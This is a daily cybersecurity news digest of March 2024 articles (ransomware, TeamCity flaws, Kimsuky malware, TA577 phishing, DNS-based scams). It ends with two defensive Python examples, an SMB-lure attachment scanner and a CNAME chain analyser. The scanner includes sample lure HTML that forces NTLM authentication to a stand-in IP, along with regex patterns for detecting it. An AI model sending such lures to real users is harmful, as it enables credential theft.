Daily Brief
Find articles below; see 'Details' for the generated summaries.
Total articles found: 11797
| Date | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2024-03-05 15:53:08 | bleepingcomputer | CYBERCRIME | BlackCat Ransomware Announces Shutdown in Alleged Exit Scam | The BlackCat ransomware gang is allegedly performing an exit scam, having taken its Tor data leak blog and negotiation servers offline.
The administrators put up a fake FBI seizure notice to suggest that federal law enforcement had intervened.
Ransomware expert Fabian Wosar noted that the notice was a crude copy, pointing to it being part of the scam.
An affiliate has accused the group of stealing a $20 million ransom that was owed to them.
The group, which previously operated as DarkSide and BlackMatter and was behind several high-profile attacks, has seen its activity fluctuate under law enforcement pressure.
BlackCat operators claim to be selling their malware source code for $5 million amid signs of wrapping up operations.
It remains uncertain whether the group will resurface under a different name, given their tarnished reputation among potential affiliates. | Details |
| 2024-03-05 15:06:48 | bleepingcomputer | MISCELLANEOUS | Reducing Organizational Costs Through Efficient Password Management | Password management can significantly impact organizations, incurring costs through lost productivity, help desk support, and security risks.
Employees spend an average of 11 hours per year on password-related issues, costing organizations $480.26 per employee in lost productivity.
Help desk calls for password resets can comprise up to 50% of queries, with substantial expenses in support staff salaries and operational costs.
Weak or reused passwords contribute to security vulnerabilities, with 86% of data breaches involving stolen credentials, and the average breach cost now at $4.45 million.
Implementing multi-factor authentication (MFA) and single sign-on (SSO) solutions can enhance security while reducing help desk burden and costs.
Regular employee training on password best practices and investing in password security software can prevent security incidents and operational inefficiencies.
Self-service password reset options enable users to efficiently manage their passwords without help desk assistance, further reducing organizational expenses. | Details |
| 2024-03-05 14:35:46 | bleepingcomputer | NATION STATE ACTIVITY | North Korean Hackers Deploy New 'ToddlerShark' Malware via ScreenConnect Flaws | North Korean state-sponsored hacking group Kimsuky is exploiting vulnerabilities in ScreenConnect to install ToddlerShark malware.
ToddlerShark malware is designed for long-term espionage, leveraging legitimate Microsoft binaries and altering the system registry to lower defenses.
The malware establishes persistent access through scheduled tasks and continuously steals and exfiltrates data.
ToddlerShark is a variant of Kimsuky's BabyShark and ReconShark backdoors previously targeting various international targets.
The polymorphic nature of the malware makes it difficult to detect through static detection methods or signature-based systems.
ToddlerShark's dynamic URL generation and unique payload hashes add to the difficulty of blocking the malware.
Kroll says it will publish a detailed analysis and indicators of compromise (IoCs) for ToddlerShark in an upcoming blog post. | Details |
| 2024-03-05 13:19:07 | theregister | CYBERCRIME | Rapid7 Criticizes JetBrains for Uncoordinated Vulnerability Disclosure | Rapid7 reported two critical vulnerabilities in JetBrains' TeamCity CI/CD server in mid-February.
JetBrains silently patched the vulnerabilities without a public advisory, contrary to infosec community norms.
After Rapid7's warning, JetBrains published details of the vulnerabilities but didn't explain the silent patching.
Exploitation attempts began shortly after disclosure, amplifying concerns about the uncoordinated release.
CVE-2024-27198 is rated critical: an authentication bypass that lets an unauthenticated attacker take administrative control of the server and execute code on it.
CVE-2024-27199 is a path traversal flaw that allows limited information disclosure and modification of some system settings without authentication, including changes that could let an attacker intercept client connections (MITM).
TeamCity Cloud instances have already been patched; on-premises installations must update to 2023.11.4 or apply the security patch plugin.
The security community criticizes JetBrains' failure to adhere to coordinated vulnerability disclosure protocols. | Details |
| 2024-03-05 11:00:57 | thehackernews | CYBERCRIME | Sophisticated DNS-Based Scam Targets Global Investors | A cybercriminal actor tracked as Savvy Seahorse is abusing DNS to defraud victims through fake investment platforms.
The scam entices individuals from various language groups, including Russian, Polish, and German speakers, showing a wide-reaching campaign.
Social media ads and fake ChatGPT and WhatsApp bots lure victims into revealing personal information for purported high-return investments.
The technical approach involves using DNS CNAME records to distribute traffic, making their phishing infrastructure elusive and resistant to takedown.
Victims are tricked into entering personal details and depositing funds into fraudulent trading platforms, which are then transferred to a Russian bank.
There is selective targeting as the actor excludes traffic from certain countries, such as Ukraine and India, though the rationale behind these exclusions is unclear.
The campaign shows the growing sophistication of DNS abuse in financial scams and is reported as the first known use of CNAME records as a traffic distribution system for such activity. | Details |
| 2024-03-05 11:00:57 | thehackernews | MISCELLANEOUS | Enhancing Cybersecurity with Effective Exposure Management | Exposure management in cybersecurity provides visibility into the entire attack surface and identifies points of vulnerability within an organization's infrastructure.
It differs from external attack surface management (EASM) by also considering data assets, user identities, and cloud configurations for a more comprehensive risk assessment.
Organizations are shifting to cloud environments or hybrid models, expanding their attack surfaces and complicating the monitoring and securing processes.
Security teams face challenges due to the dynamic threat landscape, with thousands of new vulnerabilities identified regularly, including critical ones exploited by ransomware.
The reactive nature of traditional security processes and fragmented data across different tools makes it difficult to prioritize and address threats effectively.
Exposure management aims to provide a prioritized, contextual view of potential breaches, helping organizations focus on mitigating the most serious risks first.
Automated vulnerability management tools, like Intruder, help organizations continuously monitor changes and manage vulnerabilities efficiently. | Details |
| 2024-03-05 10:45:08 | thehackernews | DATA BREACH | Over 225K ChatGPT Credentials Sold on Dark Web | Over 225,000 OpenAI ChatGPT login credentials have been sold on dark web markets.
The credentials theft was linked to malware families LummaC2, Raccoon, and RedLine.
A 36% increase in compromised ChatGPT accounts was observed from June to October 2023 compared to the first five months of the year.
The surge in stolen credentials coincides with nation-state actors' interest in using AI and LLMs for cyberattacks.
Cybercriminals are targeting devices with access to AI systems, using stolen data for espionage and conducting attacks.
The misuse of valid account information has become a primary method for gaining initial access, complicating identity and access management for defenders.
IBM X-Force warns that enterprise credentials can be stolen via credential reuse, browser credential stores, or from enterprise accounts accessed on personal devices. | Details |
| 2024-03-05 10:29:26 | thehackernews | CYBERCRIME | Sophisticated Phishing Scam Steals Credentials via Email Thread Hijacking | TA577, a notorious threat actor, has been observed using ZIP archives in phishing emails to steal NTLM hashes.
Two significant campaigns were detected on February 26 and 27, 2024, targeting hundreds of organizations worldwide with thousands of messages.
The phishing strategy involves hijacking existing email threads and attaching ZIP files containing HTML files that force the victim's machine to connect to an actor-controlled SMB server.
The HTML attachments capture NTLMv2 challenge/response pairs, which attackers can crack offline to recover passwords or relay to other services (the captured responses are not themselves reusable for pass-the-hash); either path allows unauthorized network access and data theft.
TA577, also known as Water Curupira, is proficient in distributing advanced malware and has a history of rapidly adopting new cyberattack techniques.
Proofpoint highlights TA577's agility in adapting to the cybersecurity landscape, continuously evolving methods to evade detection.
To mitigate risks, organizations are advised to block outbound SMB connections to curb potential exploit avenues. | Details |
| 2024-03-05 09:33:17 | theregister | DATA BREACH | Charity Penalized for Sending Unauthorized Solicitation Texts | Penny Appeal, a charity working in crisis-hit countries, has been ordered by the UK ICO to stop sending unsolicited texts.
The charity was found to have sent over 460,000 spam texts in ten days without valid consent from the recipients.
ICO received 354 complaints, with recipients reporting ignored opt-out requests and intrusive messaging.
Penny Appeal's failure to heed prior warnings resulted in an ICO investigation exposing a flawed database practice.
The charity failed to log opt-out requests, messaging individuals who had interacted within the past five years.
ICO stresses the importance of valid consent for marketing communications, regardless of the organization's size.
This is not the first instance of a charity facing ICO scrutiny; larger charities have previously been fined.
The ICO's action highlights the ongoing responsibility for all entities, including non-profits, to comply with direct marketing laws. | Details |
| 2024-03-05 03:41:48 | thehackernews | CYBERCRIME | Critical Vulnerabilities in JetBrains TeamCity Lead to Urgent Patch | Newly disclosed security vulnerabilities in JetBrains TeamCity could allow attackers to take over servers.
The identified flaws, CVE-2024-27198 and CVE-2024-27199, have been fixed in the latest TeamCity version.
Attackers exploiting these vulnerabilities could bypass authentication and potentially compromise a server, facilitating supply chain attacks.
Rapid7 discovered and reported the flaws: an authentication bypass (CVE-2024-27198) and a path traversal issue (CVE-2024-27199).
TeamCity Cloud instances have already been patched, but on-premises versions require immediate updates.
Prior vulnerabilities in TeamCity have seen exploitation by threat actors from North Korea and Russia, highlighting the risks of delay in patching.
JetBrains urges users to update their TeamCity servers to mitigate the risk of exploitation. | Details |
| 2024-03-05 01:34:33 | theregister | DDOS | Cloudflare Introduces AI-Specific Firewall to Combat DDoS and Data Leaks | Cloudflare has enhanced its web application firewall (WAF) to include protections specifically designed for applications utilizing large language models (LLMs).
The service, known as "Firewall for AI," aims to prevent DDoS attacks and the leakage of sensitive data from LLM applications.
Features include Advanced Rate Limiting, which caps the number of requests from a single IP or API key, and Sensitive Data Detection, geared towards identifying and preventing private information from being exposed.
Clients will be able to create tailored fingerprints to control what their models reveal, with plans to introduce a beta version of prompt validation to defend against prompt injection attacks.
This new firewall offering can be applied to any LLM, regardless of whether it's hosted on Cloudflare Workers AI or other platforms, as long as the traffic is proxied through Cloudflare.
Cloudflare's move is a response to security concerns in AI as more companies integrate LLMs into their products, highlighting the need for specialized AI security measures. | Details |
| 2024-03-04 23:07:03 | theregister | DATA BREACH | American Express Customer Data Leaked Through Vendor Error | A security lapse at a third-party service provider resulted in the exposure of American Express cardholder information, including card numbers and expiry dates.
The breach involved personal data of an undisclosed number of American Express customers but did not compromise American Express's own systems.
American Express's chief privacy officer, Anneke Covell, alerted affected customers through a letter advising of the potential compromise of their card account information.
The state of Massachusetts publicized the incident, noting that it is the 16th breach notification involving American Express filed in the state this year.
Past data breaches reported involved single-digit numbers of Massachusetts residents and were often due to compromised individual merchants or data found online by law enforcement.
American Express assures customers that they will not be held liable for fraudulent charges and advises customers to monitor their accounts and enable alerts for suspicious activities. | Details |
| 2024-03-04 22:46:15 | bleepingcomputer | MALWARE | Critical TeamCity Vulnerability Risk: Immediate Patching Recommended | A severe security vulnerability (CVE-2024-27198) has been identified in JetBrains’ TeamCity On-Premises software, enabling attackers to gain administrative control of the server without authentication.
Administrators are urged to promptly upgrade to TeamCity version 2023.11.4 or apply a security patch plugin, as full exploit details are public.
The JetBrains update also resolves a secondary vulnerability (CVE-2024-27199), a path traversal flaw that let unauthenticated users alter certain system settings.
Both vulnerabilities affect the web component of all on-premises TeamCity versions before the fix, posing a risk of supply chain attacks via the build pipeline.
Rapid7 demonstrated exploitability with a proof-of-concept that obtains a shell on a TeamCity server.
The less severe vulnerability could potentially be exploited to execute DoS attacks or intercept client connections if the attacker is already on the network.
While the TeamCity cloud service has been patched, all unpatched on-premises installations remain vulnerable, and threat actors are anticipated to exploit these weaknesses imminently. | Details |
| 2024-03-04 22:15:32 | bleepingcomputer | NATION STATE ACTIVITY | Kimsuky APT Exploits ScreenConnect Flaws to Deploy ToddlerShark Malware | North Korean state-sponsored hacking group Kimsuky is exploiting ScreenConnect flaws to deploy ToddlerShark malware for espionage.
ConnectWise had earlier urged ScreenConnect users to update their servers to patch CVE-2024-1708 and CVE-2024-1709.
ToddlerShark uses polymorphism and legitimate Microsoft binaries to evade detection and establishes persistence for continuous data theft.
The malware modifies registry settings, creates scheduled tasks, and gathers system information that it sends to the attackers' C2 infrastructure.
Kroll's threat intelligence report describes ToddlerShark's evasion techniques and ties it to the previously known Kimsuky backdoors BabyShark and ReconShark.
Kroll is set to release specific details and indicators of compromise for ToddlerShark in an upcoming blog post. | Details |
| 2024-03-04 21:49:52 | bleepingcomputer | CYBERCRIME | TA577 Group Phishing Campaign Targets Windows NTLM Hashes | Hackers from TA577 are using phishing emails to steal Windows NTLM authentication hashes, enabling account hijacking.
Two recent waves of attacks on February 26 and 27, 2024, specifically targeted employees' hashes at hundreds of organizations worldwide.
Captured NTLM hashes can facilitate unauthorized access to accounts, sensitive data, and lateral movement within networks.
The phishing emails contained ZIP archives with HTML files designed to silently connect to an attacker-controlled SMB server to capture NTLM hashes.
Proofpoint's report indicates that despite the lack of malware payloads, the primary objective of these phishing efforts is to gather NTLM hashes.
Proofpoint notes that accounts without multi-factor authentication are more exposed to this technique, and that the stolen hashes may also serve as reconnaissance to identify high-value targets.
Recommended defensive measures include blocking outbound SMB (TCP 445) at the perimeter, filtering emails that carry zipped HTML files, and configuring the Windows group policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" to audit and then deny outgoing NTLM. | Details |
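
The TA577 lure described in the two entries above (a ZIP archive containing an HTML file that forces an outbound SMB connection) can be screened at the mail gateway before a user ever opens it. The Python below is an added example and not code from Proofpoint or from the original page: it unpacks a ZIP attachment in memory and flags any member that references a remote SMB path, either a `file://host/...` URL with a non-empty host or a `\\host\share` UNC path. The sample archive, its HTML members and the 203.0.113.5 address (a documentation range) are constructed for the example.

```python
"""Screen a zipped HTML e-mail attachment for the TA577-style NTLM lure.

Added example; the sample archive, its HTML members and the 203.0.113.5
address (TEST-NET-3) are constructed for illustration.
"""
import io
import re
import zipfile

# file://host/... has a non-empty authority and makes Windows open an SMB
# share on that host; the local form file:///C:/... does not.
REMOTE_FILE_URL = re.compile(r"""file://(?!/)([^/\\\s"'<>]+)""", re.IGNORECASE)
# A UNC path such as \\host\share\x embedded in an HTML attribute.
UNC_PATH = re.compile(r"""\\\\([^\\/\s"'<>]+)\\[^\\\s"'<>]+""")


def find_smb_lures(html: str) -> list[tuple[str, str]]:
    """Return (host, matched_text) for every remote-SMB reference in the HTML."""
    hits = []
    for pattern in (REMOTE_FILE_URL, UNC_PATH):
        for m in pattern.finditer(html):
            hits.append((m.group(1), m.group(0)))
    return hits


def scan_zip_attachment(data: bytes, max_member_size: int = 2_000_000) -> list[dict]:
    """Unpack a ZIP in memory and report members that would trigger an outbound
    SMB connection. Detection is content-based, so a renamed .htm/.shtml member
    is still caught; oversized members are skipped to bound memory use."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir() or info.file_size > max_member_size:
                continue
            text = zf.read(info).decode("utf-8", errors="ignore")
            for host, snippet in find_smb_lures(text):
                findings.append({"member": info.filename, "host": host, "snippet": snippet})
    return findings


# Constructed sample attachment: two lure pages and one benign page.
LURE_REFRESH = (
    "<html><head>"
    '<meta http-equiv="refresh" content="0; url=file://203.0.113.5/docs/invoice.txt">'
    "</head><body>Loading document...</body></html>"
)
LURE_UNC = '<html><body><img src="\\\\203.0.113.5\\share\\pixel.png"></body></html>'
BENIGN = (
    '<html><body><a href="https://example.com/report">report</a>'
    '<img src="file:///C:/Users/Public/logo.png"></body></html>'
)


def build_sample_zip() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Invoice_2024-02-26.html", LURE_REFRESH)
        zf.writestr("tracker.html", LURE_UNC)
        zf.writestr("readme.html", BENIGN)
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_zip_attachment(build_sample_zip()):
        print(f"{f['member']}: remote SMB host {f['host']} via {f['snippet']}")
```

A hit does not prove the attachment is TA577's, only that opening it would make a Windows host authenticate to an outside server, which is reason enough to quarantine. Pair the gateway check with the host-side controls the entries above recommend: block outbound TCP 445 at the perimeter, and set the "Restrict NTLM: Outgoing NTLM traffic to remote servers" policy (the RestrictSendingNTLMTraffic value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0, 1 = audit, 2 = deny) to audit first and deny once the event log shows no legitimate dependencies.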
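
The CNAME-based traffic distribution described in the Savvy Seahorse entry above is easier to hunt, and to disrupt, when alias chains are followed to their end and domains are grouped by where they land. The Python below is an added example and not code from the original page. SAMPLE_ZONE is a constructed stand-in for live DNS answers (all names use the reserved .example TLD and the IPs come from documentation ranges) so the block runs offline; against real data you would replace the dictionary lookup with resolver queries. It follows CNAME chains with loop and depth protection, clusters names by terminal target, and shows why re-pointing the one base record moves every lure domain at once while takedowns of individual leaf domains change nothing.

```python
"""Follow CNAME chains and cluster lure domains by their terminal target.

Added example. SAMPLE_ZONE is a constructed stand-in for live DNS answers:
names use the reserved .example TLD and the IPs are documentation ranges.
"""
from collections import defaultdict

# name -> (record type, value). Two lookalike lure domains alias one actor
# base name; the base's A record can be re-pointed without touching them.
SAMPLE_ZONE = {
    "invest-gold-bonus.example":   ("CNAME", "lp.trade-cname.example"),
    "crypto-profit-now.example":   ("CNAME", "lp.trade-cname.example"),
    "lp.trade-cname.example":      ("CNAME", "edge.trade-cname.example"),
    "edge.trade-cname.example":    ("A", "198.51.100.23"),
    "shop.legit-retailer.example": ("CNAME", "cdn.legit-retailer.example"),
    "cdn.legit-retailer.example":  ("A", "192.0.2.80"),
    "loop-a.example":              ("CNAME", "loop-b.example"),
    "loop-b.example":              ("CNAME", "loop-a.example"),
    "dangling.example":            ("CNAME", "gone.example"),
}

MAX_CHAIN = 8   # resolvers cap CNAME chasing; an over-long chain is itself a signal


def resolve_chain(name, zone):
    """Return (chain, terminal, ip): every name visited, the last name reached,
    and its A record (None on a dangling target, a loop or an over-long chain)."""
    chain, seen, current = [name], {name}, name
    while True:
        record = zone.get(current)
        if record is None:                     # NXDOMAIN: dangling CNAME
            return chain, current, None
        rtype, value = record
        if rtype == "A":
            return chain, current, value
        if value in seen or len(chain) >= MAX_CHAIN:   # loop or abusive depth
            return chain, current, None
        chain.append(value)
        seen.add(value)
        current = value


def cluster_by_terminal(domains, zone):
    """Group aliased domains by the name their CNAME chain ends on. Domains
    that share a terminal share infrastructure even if they look unrelated."""
    clusters = defaultdict(list)
    for domain in domains:
        chain, terminal, _ = resolve_chain(domain, zone)
        if len(chain) > 1:                     # skip names with no CNAME at all
            clusters[terminal].append(domain)
    return {terminal: sorted(names) for terminal, names in clusters.items()}


def repoint(zone, base_name, new_ip):
    """Simulate the actor rotating the base A record; returns the IP every
    domain ending on base_name now resolves to, with leaf records untouched."""
    updated = dict(zone)
    updated[base_name] = ("A", new_ip)
    moved = {}
    for domain in updated:
        _, terminal, ip = resolve_chain(domain, updated)
        if terminal == base_name:
            moved[domain] = ip
    return moved


if __name__ == "__main__":
    for terminal, names in cluster_by_terminal(SAMPLE_ZONE, SAMPLE_ZONE).items():
        print(terminal, "<-", names)
    print(repoint(SAMPLE_ZONE, "edge.trade-cname.example", "203.0.113.9"))
```

The practical consequence for defenders is that the terminal name, not the registered lure domain, is the chokepoint: blocking or sinkholing `edge.trade-cname.example` in the sample neutralises every alias in one step, whereas reporting the lure domains one at a time leaves the base free to acquire new ones. Loops and dangling targets are returned rather than raised because, in passive DNS data, both are common and a hunting job should keep going.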